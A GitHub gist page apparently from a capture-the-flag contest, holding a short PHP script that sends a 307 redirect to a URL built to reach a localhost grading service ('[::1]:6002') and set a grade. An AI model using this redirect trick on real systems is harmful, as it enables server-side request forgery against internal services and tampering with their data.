Skip to content

Instantly share code, notes, and snippets.

@Sytten
Created May 19, 2020 01:54
Show Gist options
  • Save Sytten/c37327aed567e5b35ae56df0d3a4ffac to your computer and use it in GitHub Desktop.
Save Sytten/c37327aed567e5b35ae56df0d3a4ffac to your computer and use it in GitHub Desktop.
failing-revenge-redirect
<?php
header("Location: https://gradeservers.ctf/[::1]:6002/grade/15/1/F");
http_response_code(307);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment